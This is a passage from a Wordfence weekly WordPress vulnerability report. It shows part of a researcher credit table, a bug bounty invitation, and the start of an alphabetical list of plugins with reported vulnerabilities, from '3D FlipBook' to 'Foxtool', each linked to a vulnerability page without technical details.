					<img decoding="async" src="https://www.gravatar.com/avatar/f9932c44b54c5b8427aeaa4697fb9106.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f9932c44b54c5b8427aeaa4697fb9106"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/muhan-luo" target="_blank" rel="noopener">Muhan Luo</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/e846d74e36253a0b9cca6affd02f1ce8.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="e846d74e36253a0b9cca6affd02f1ce8"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/asdqgggg" target="_blank" rel="noopener">asdqgggg</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jesse-mcneil" target="_blank" rel="noopener">Jesse McNeil</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/88e4afd96b32c7203b17e19cf81411f6.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="88e4afd96b32c7203b17e19cf81411f6"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/agentunio" target="_blank" rel="noopener">Filip Kowalski (Agentunio)</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/d90411d33d3b4405863dd1418e0950aa.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d90411d33d3b4405863dd1418e0950aa"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ahmed-embaby" target="_blank" rel="noopener">Ahmed Embaby</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/45acf8b492a9823d9b6f95bcc17730f3.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="45acf8b492a9823d9b6f95bcc17730f3"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ossacip-thanh" target="_blank" rel="noopener">Ossacip Thanh</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/9ce567c2aebe49665baff705399d2e66.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="9ce567c2aebe49665baff705399d2e66"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/meher-sudhakar-abbireddi" target="_blank" rel="noopener">Meher Sudhakar Abbireddi</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/f01b135d48b072ae23afe2e4156b8d99.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f01b135d48b072ae23afe2e4156b8d99"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/a0yark" target="_blank" rel="noopener">a0yark</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/ac6bf1005b916352d965412b8d10a2a5.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="ac6bf1005b916352d965412b8d10a2a5"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/wei-hsiang-wang" target="_blank" rel="noopener">WEI HSIANG WANG</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/848ff46b2a1d687cc8e2670b302e1548.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="848ff46b2a1d687cc8e2670b302e1548"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/civitasmass" target="_blank" rel="noopener">Civitasmass</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/30be710f698d639149a73105e793c201.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="30be710f698d639149a73105e793c201"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/n4kk0" target="_blank" rel="noopener">Naoya Takahashi (nakko)</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/04dc25fcada9520afe8fb170e539d8b9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="04dc25fcada9520afe8fb170e539d8b9"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/yaswanth-reddy-sunkara" target="_blank" rel="noopener">Yaswanth Reddy Sunkara</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/189db1733c87d0f400ae8929c36bf3d2.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="189db1733c87d0f400ae8929c36bf3d2"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/adem0n" target="_blank" rel="noopener">Adem0n__</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/547ae1bca33f86331d44f737649d761e.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="547ae1bca33f86331d44f737649d761e"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/cyberkareem" target="_blank" rel="noopener">cyberkareem</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/animesh-gaurav" target="_blank" rel="noopener">Animesh Gaurav</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/e24d8d2ef42b84d077066bb8e7c1419c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="e24d8d2ef42b84d077066bb8e7c1419c"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nism0" target="_blank" rel="noopener">nism0</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/4ecc8b71d0984f421844d12e862a7638.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4ecc8b71d0984f421844d12e862a7638"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/austin-ginder" target="_blank" rel="noopener">Austin Ginder</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/ada42d21bcb1f3fa76a6f4a779247ab1.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="ada42d21bcb1f3fa76a6f4a779247ab1"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/alihan-sahin" target="_blank" rel="noopener">Alihan Şahin</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/1a8f0ec92689cfed49e9d0603226eee4.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="1a8f0ec92689cfed49e9d0603226eee4"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ayush-gangwar" target="_blank" rel="noopener">Ayush Gangwar</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/0e9aefbc4cb54cf3036b239ab7786ca3.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="0e9aefbc4cb54cf3036b239ab7786ca3"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/farhan-fawwaz-saputra" target="_blank" rel="noopener">Farhan Fawwaz Saputra</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/8e196345806e141d3c31b5b5d8489ec0.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="8e196345806e141d3c31b5b5d8489ec0"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/seongwon-lee" target="_blank" rel="noopener">Seongwon Lee</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/c2dae9339cb7a7417b7eedcaf09ddf9e.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="c2dae9339cb7a7417b7eedcaf09ddf9e"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/suhayb-ahmed" target="_blank" rel="noopener">Suhayb Ahmed</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/d2de85470fb8bc914ee4f18ea34d49db.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d2de85470fb8bc914ee4f18ea34d49db"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/thevietronin" target="_blank" rel="noopener">thevietronin</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/01e9ff51a749f2beebcde4e6d5b68519.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="01e9ff51a749f2beebcde4e6d5b68519"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nguyen-cong-quang" target="_blank" rel="noopener">Nguyen Cong Quang</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/76b37473036c0cad989fac58fdce9e75.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="76b37473036c0cad989fac58fdce9e75"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/z3r0s" target="_blank" rel="noopener">z3r0s</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
</table>
<p><em>Are you a security researcher who would like to be featured in our weekly vulnerability report?</em> You can responsibly disclose your WordPress vulnerability discoveries to us and earn a bounty on in-scope vulnerabilities <a href="https://www.wordfence.com/threat-intel/vulnerabilities/submit/" target="_blank" rel="noopener">through our Bug Bounty Program</a>. Responsibly disclosing your vulnerability discoveries to us will also get your name added on the <a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/" target="_blank" rel="noopener">Wordfence Intelligence leaderboard</a> along with being mentioned in our weekly vulnerability report.</p>
<hr>
<h3>WordPress Plugins with Reported Vulnerabilities Last Week</h3>
</p>
<table class="wfvr-list-table software-list">
<tr>
<th class="text-center w-50">Software Name</th>
<th class="text-center">Software Slug</th>
</tr>
<tr>
<td>3D FlipBook – PDF Embedder, PDF Flipbook Viewer, Flipbook Image Gallery</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/interactive-3d-flipbook-powered-physics-engine" target="_blank" rel="noopener">interactive-3d-flipbook-powered-physics-engine</a>
		</td>
</tr>
<tr>
<td>Active Woot Products Tables for WooCommerce. 100% FREE </td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/profit-products-tables-for-woocommerce" target="_blank" rel="noopener">profit-products-tables-for-woocommerce</a>
		</td>
</tr>
<tr>
<td>Ad Inserter – Ad Manager &amp; AdSense Ads</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ad-inserter" target="_blank" rel="noopener">ad-inserter</a>
		</td>
</tr>
<tr>
<td>Add User Autocomplete</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/add-user-autocomplete" target="_blank" rel="noopener">add-user-autocomplete</a>
		</td>
</tr>
<tr>
<td>Admin Menu Editor Pro</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/admin-menu-editor-pro" target="_blank" rel="noopener">admin-menu-editor-pro</a>
		</td>
</tr>
<tr>
<td>Advanced Custom Fields: Extended PRO</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/acf-extended-pro" target="_blank" rel="noopener">acf-extended-pro</a>
		</td>
</tr>
<tr>
<td>Advanced Popups</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/advanced-popups" target="_blank" rel="noopener">advanced-popups</a>
		</td>
</tr>
<tr>
<td>AF Companion – Starter Sites, Speed Booster &amp; Growth Suite for Professional Publishing</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/af-companion" target="_blank" rel="noopener">af-companion</a>
		</td>
</tr>
<tr>
<td>AI Engine – The Chatbot, AI Framework &amp; MCP for WordPress</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ai-engine" target="_blank" rel="noopener">ai-engine</a>
		</td>
</tr>
<tr>
<td>Album Cover Finder</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/album-cover-finder" target="_blank" rel="noopener">album-cover-finder</a>
		</td>
</tr>
<tr>
<td>All Bootstrap Blocks</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/all-bootstrap-blocks" target="_blank" rel="noopener">all-bootstrap-blocks</a>
		</td>
</tr>
<tr>
<td>All-in-One WP Migration and Backup</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/all-in-one-wp-migration" target="_blank" rel="noopener">all-in-one-wp-migration</a>
		</td>
</tr>
<tr>
<td>AppMySite – WordPress &amp; WooCommerce Mobile App Builder (No-Code Android &amp; iOS App Maker)</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/appmysite" target="_blank" rel="noopener">appmysite</a>
		</td>
</tr>
<tr>
<td>Appointment Booking Plugin – LatePoint | Calendar &amp; Scheduling for WordPress</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/latepoint-2" target="_blank" rel="noopener">latepoint</a>
		</td>
</tr>
<tr>
<td>Appointment Hour Booking – Booking Calendar</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/appointment-hour-booking" target="_blank" rel="noopener">appointment-hour-booking</a>
		</td>
</tr>
<tr>
<td>Asset CleanUp: Page Speed Booster</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-asset-clean-up" target="_blank" rel="noopener">wp-asset-clean-up</a>
		</td>
</tr>
<tr>
<td>Auto Upload Images</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/auto-upload-images" target="_blank" rel="noopener">auto-upload-images</a>
		</td>
</tr>
<tr>
<td>Autopay</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/platnosci-online-blue-media" target="_blank" rel="noopener">platnosci-online-blue-media</a>
		</td>
</tr>
<tr>
<td>aVideo</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/avideo" target="_blank" rel="noopener">avideo</a>
		</td>
</tr>
<tr>
<td>BE REST Endpoints</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/be-rest-endpoints" target="_blank" rel="noopener">be-rest-endpoints</a>
		</td>
</tr>
<tr>
<td>BerqWP – All-In-One Optimization for Core Web Vitals, Cache, CDN, Images, CSS &amp; JavaScript</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/searchpro" target="_blank" rel="noopener">searchpro</a>
		</td>
</tr>
<tr>
<td>Better Messages – Chat Rooms, Group Chat, Private Messages &amp; AI Chat Bots</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/bp-better-messages" target="_blank" rel="noopener">bp-better-messages</a>
		</td>
</tr>
<tr>
<td>BlockSpare – Gutenberg Blocks, AI Content Generator &amp; Site Builder for News, Magazine &amp; Blogs</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/blockspare" target="_blank" rel="noopener">blockspare</a>
		</td>
</tr>
<tr>
<td>Blog2Social: Social Media Auto Post &amp; Scheduler</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/blog2social" target="_blank" rel="noopener">blog2social</a>
		</td>
</tr>
<tr>
<td>Bold Page Builder</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/bold-page-builder" target="_blank" rel="noopener">bold-page-builder</a>
		</td>
</tr>
<tr>
<td>Booking Calendar</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/booking" target="_blank" rel="noopener">booking</a>
		</td>
</tr>
<tr>
<td>Booking for Appointments and Events Calendar – Amelia</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ameliabooking" target="_blank" rel="noopener">ameliabooking</a>
		</td>
</tr>
<tr>
<td>Bookit — Booking &amp; Appointment Calendar</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/bookit" target="_blank" rel="noopener">bookit</a>
		</td>
</tr>
<tr>
<td>Botiga Pro</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/botiga-pro" target="_blank" rel="noopener">botiga-pro</a>
		</td>
</tr>
<tr>
<td>Bread</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/bread" target="_blank" rel="noopener">bread</a>
		</td>
</tr>
<tr>
<td>Breeze Cache</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/breeze" target="_blank" rel="noopener">breeze</a>
		</td>
</tr>
<tr>
<td>Brizy – Page Builder</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/brizy" target="_blank" rel="noopener">brizy</a>
		</td>
</tr>
<tr>
<td>Business Name Generator</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/designbro-business-name-generator" target="_blank" rel="noopener">designbro-business-name-generator</a>
		</td>
</tr>
<tr>
<td>Checkout Field Manager (Checkout Manager) for WooCommerce</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woocommerce-checkout-manager" target="_blank" rel="noopener">woocommerce-checkout-manager</a>
		</td>
</tr>
<tr>
<td>Choose User Role at Registration for WooCommerce</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/choose-user-role-at-registration" target="_blank" rel="noopener">choose-user-role-at-registration</a>
		</td>
</tr>
<tr>
<td>Clean Login</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/clean-login" target="_blank" rel="noopener">clean-login</a>
		</td>
</tr>
<tr>
<td>Co-Authors, Multiple Authors and Guest Authors in an Author Box with PublishPress Authors</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/publishpress-authors" target="_blank" rel="noopener">publishpress-authors</a>
		</td>
</tr>
<tr>
<td>Comments Import &amp; Export</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/comments-import-export-woocommerce" target="_blank" rel="noopener">comments-import-export-woocommerce</a>
		</td>
</tr>
<tr>
<td>Complianz GDPR/CCPA Cookie Consent Banner</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/complianz-gdpr" target="_blank" rel="noopener">complianz-gdpr</a>
		</td>
</tr>
<tr>
<td>Contest Gallery – Upload &amp; Vote Photos, Media, Sell with PayPal &amp; Stripe</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/contest-gallery" target="_blank" rel="noopener">contest-gallery</a>
		</td>
</tr>
<tr>
<td>Cooked – Recipe Management</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/cooked" target="_blank" rel="noopener">cooked</a>
		</td>
</tr>
<tr>
<td>Create</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/mediavine-create" target="_blank" rel="noopener">mediavine-create</a>
		</td>
</tr>
<tr>
<td>CSS &amp; JavaScript Toolbox</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/css-javascript-toolbox" target="_blank" rel="noopener">css-javascript-toolbox</a>
		</td>
</tr>
<tr>
<td>Custom Field Template</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/custom-field-template" target="_blank" rel="noopener">custom-field-template</a>
		</td>
</tr>
<tr>
<td>Custom Twitter Feeds – A Tweets Widget or X Feed Widget</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/custom-twitter-feeds" target="_blank" rel="noopener">custom-twitter-feeds</a>
		</td>
</tr>
<tr>
<td>Datalogics Ecommerce Delivery – Datalogics</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/datalogics" target="_blank" rel="noopener">datalogics</a>
		</td>
</tr>
<tr>
<td>design-scuole-wordpress-theme</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/UNKNOWN-CVE-2026-87791" target="_blank" rel="noopener">design-scuole-wordpress-theme</a>
		</td>
</tr>
<tr>
<td>Dewa Kirim – WooCommerce Gojek / Gosend</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/dewa-kirim-woocommerce-gojek" target="_blank" rel="noopener">dewa-kirim-woocommerce-gojek</a>
		</td>
</tr>
<tr>
<td>Dictionary</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/dictionary" target="_blank" rel="noopener">dictionary</a>
		</td>
</tr>
<tr>
<td>Divi Essentials</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/divi-essential" target="_blank" rel="noopener">divi-essential</a>
		</td>
</tr>
<tr>
<td>Download Manager</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/download-manager" target="_blank" rel="noopener">download-manager</a>
		</td>
</tr>
<tr>
<td>DS Ad Rotator</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ds-adrotator" target="_blank" rel="noopener">ds-adrotator</a>
		</td>
</tr>
<tr>
<td>Easy Appointments</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/easy-appointments" target="_blank" rel="noopener">easy-appointments</a>
		</td>
</tr>
<tr>
<td>Easy Form Builder by WhiteStudio – Drag &amp; Drop Form Builder</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/easy-form-builder" target="_blank" rel="noopener">easy-form-builder</a>
		</td>
</tr>
<tr>
<td>Easy Invoice – Invoice Generator, PDF Quotes &amp; Payments</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/easy-invoice" target="_blank" rel="noopener">easy-invoice</a>
		</td>
</tr>
<tr>
<td>EduAdmin Booking</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/eduadmin-booking" target="_blank" rel="noopener">eduadmin-booking</a>
		</td>
</tr>
<tr>
<td>Element Pack Addons for Elementor – Elementor Widgets, Elementor Templates, Elementor Addons</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/bdthemes-element-pack-lite" target="_blank" rel="noopener">bdthemes-element-pack-lite</a>
		</td>
</tr>
<tr>
<td>EmbedPress – PDF Embedder, 3D PDF FlipBook, Google Reviews, YouTube Videos, Upload &amp; Embed PDF documents</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/embedpress" target="_blank" rel="noopener">embedpress</a>
		</td>
</tr>
<tr>
<td>Empik for Woocommerce</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/empik-for-woocommerce" target="_blank" rel="noopener">empik-for-woocommerce</a>
		</td>
</tr>
<tr>
<td>Estatik Real Estate Plugin</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/estatik" target="_blank" rel="noopener">estatik</a>
		</td>
</tr>
<tr>
<td>Event Booking Manager for WooCommerce – Sell Tickets, Event Registration, RSVP &amp; Event Calendar</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/mage-eventpress" target="_blank" rel="noopener">mage-eventpress</a>
		</td>
</tr>
<tr>
<td>Eventin – Events Calendar, Tickets, Registration, Booking &amp; WooCommerce</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-event-solution" target="_blank" rel="noopener">wp-event-solution</a>
		</td>
</tr>
<tr>
<td>EWWW Image Optimizer</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ewww-image-optimizer" target="_blank" rel="noopener">ewww-image-optimizer</a>
		</td>
</tr>
<tr>
<td>Export &amp; Import WPBakery Page Builder</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/vc-templates-import-export" target="_blank" rel="noopener">vc-templates-import-export</a>
		</td>
</tr>
<tr>
<td>FileBird – WordPress Media Library Folders &amp; File Manager</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/filebird" target="_blank" rel="noopener">filebird</a>
		</td>
</tr>
<tr>
<td>Filter Gallery</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/filter-gallery" target="_blank" rel="noopener">filter-gallery</a>
		</td>
</tr>
<tr>
<td>Flex Import</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/flex-import" target="_blank" rel="noopener">flex-import</a>
		</td>
</tr>
<tr>
<td>FluentAuth – Login Security, Two-Factor Authentication, Passkeys &amp; Social Login</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/fluent-security" target="_blank" rel="noopener">fluent-security</a>
		</td>
</tr>
<tr>
<td>FluentBoards – Project Management, Task Management, Goal Tracking, Kanban Board, and, Team Collaboration</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/fluent-boards" target="_blank" rel="noopener">fluent-boards</a>
		</td>
</tr>
<tr>
<td>Formidable Forms – WordPress Form Builder for Contact Forms, Calculators, Quizzes &amp; More</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/formidable" target="_blank" rel="noopener">formidable</a>
		</td>
</tr>
<tr>
<td>Forminator Forms – Contact Form, Payment Form &amp; Custom Form Builder</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/forminator" target="_blank" rel="noopener">forminator</a>
		</td>
</tr>
<tr>
<td>Foxtool All-in-One: Contact chat button, Custom login, Media optimize images</td>
<td>
